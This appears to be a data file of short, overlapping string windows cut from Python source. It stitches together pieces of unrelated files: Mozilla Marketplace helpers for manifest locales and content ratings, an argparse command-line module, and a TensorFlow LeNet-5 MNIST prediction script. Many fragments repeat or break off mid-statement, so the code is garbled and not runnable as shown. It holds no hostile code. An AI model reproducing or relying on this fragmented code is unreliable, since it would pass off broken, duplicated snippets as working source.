"default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]:",
"default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict",
"commonware.log from amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property,",
"locales found in the \"locales\" property of the manifest. This will convert locales",
"translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES",
"# Legacy ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return",
"list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = []",
"= key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys):",
"dict.\"\"\" for body in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body]",
"{}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys,",
"body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label)",
"in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return",
"default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating):",
"# Add in the default locale name. default = manifest.get('default_locale') or default_locale root_property",
"prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return",
"in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in",
"-*- from collections import defaultdict import commonware.log from amo.utils import find_language import mkt",
"also remove locales not found in AMO_LANGUAGES. Note: The default_locale is not included.",
"remove locales not found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\"",
"full locale. It will also remove locales not found in AMO_LANGUAGES. Note: The",
"not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id,",
"convert locales found in the SHORTER_LANGUAGES setting to their full locale. It will",
"mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return {} rating",
"by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for",
"rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format",
"all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List",
"rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs to",
"manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the",
"root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict def",
"root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales found in",
"manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property",
"= commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale in manifest.get('locales',",
"or {}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def",
"Note: The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys()))))",
"import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for",
"found in the \"locales\" property of the manifest. This will convert locales found",
"It will also remove locales not found in AMO_LANGUAGES. Note: The default_locale is",
"...] to ['social-networking', ...]. \"\"\" results = [] for key in keys: obj",
"body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for key",
"Slugify and remove body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label",
"of locales found in the \"locales\" property of the manifest. This will convert",
"for body in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body] =",
"\"\"\" results = [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj:",
"for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj: results.append(key.lower().replace('_', '-')) return results",
"the default locale name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if",
"locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales"
] |
[
"import argparse from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts",
"argparse from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from",
"run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\",",
"<filename>modules/cli/getcli.py import argparse from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get",
"def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\",",
"parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get",
"get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser):",
"parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Group",
"\"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Group Info\")",
"help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Group Info\") parser.set_defaults(func=get.print_groups)",
"modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts)",
"import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def",
"from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\")"
] |
[] |
[
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess)",
"= tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver",
"ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # #",
"tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np",
"= mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g)",
"mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op =",
"tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare() #x",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32,",
"= tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY)",
"saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],(",
"Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import",
"# -*- coding: utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019",
"= tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png')",
"= mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op",
"#y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ #",
"@author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as tf import",
"Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter",
"tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction =",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs},",
"g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt",
"# x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) #",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE,",
"= tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv =",
"# reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) #",
"import mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show()",
"mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None,",
"mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS])",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y",
"# y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore()",
"[None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore",
"as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs =",
"imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None)",
"= tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op)",
"np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy,",
"2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as tf",
"= imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x =",
"tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction",
"biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot",
"1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, #",
"mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS))",
"coding: utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef",
"tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x =",
"-*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from",
"tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) #",
"tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver()",
"= tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g: x =",
"#x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])",
"#y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE,",
"= tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x",
"1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image,",
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y =",
"in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x",
"plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return",
"as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata())",
"= tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y",
"= ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_,",
"[ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1)",
"tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess,",
"numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv =",
"tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE,",
"plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im =",
"= result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x",
"[(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32,",
"# [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]})",
"result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g:",
"784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) #",
"= tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE,",
"#x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g: x",
"Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import",
"# [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None,",
"tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32,",
"784]) #x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE,",
"Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in",
"tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1,",
"mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver =",
"import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def",
"tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image =",
"tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva",
"# mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess) print('recognize result:')",
"#ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x",
"init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1,",
"tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None)",
"tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver =",
"result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x =",
"= [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare() #x =",
"tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_",
"with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32,",
"= np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score =",
"= mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, #",
"mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as",
"correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image =",
"import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png')",
"= list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva",
"= Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x",
"sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS))",
"x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt =",
"np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with",
"1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image",
"y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() #",
"# ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) #",
"tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return",
"# mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) #",
"ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward",
"tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ =",
"[None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE,",
"np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva",
"= mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver",
"with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path)",
"Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import",
"accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv",
"im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for",
"= tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None)",
"tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt",
"21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as",
"tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy",
"#return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result",
"saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy",
"return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default()",
"tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction,",
"mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess) print('recognize result:') print(predint[0])",
"ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) #",
"= tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction",
"mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, #",
"= tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ =",
"mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # #",
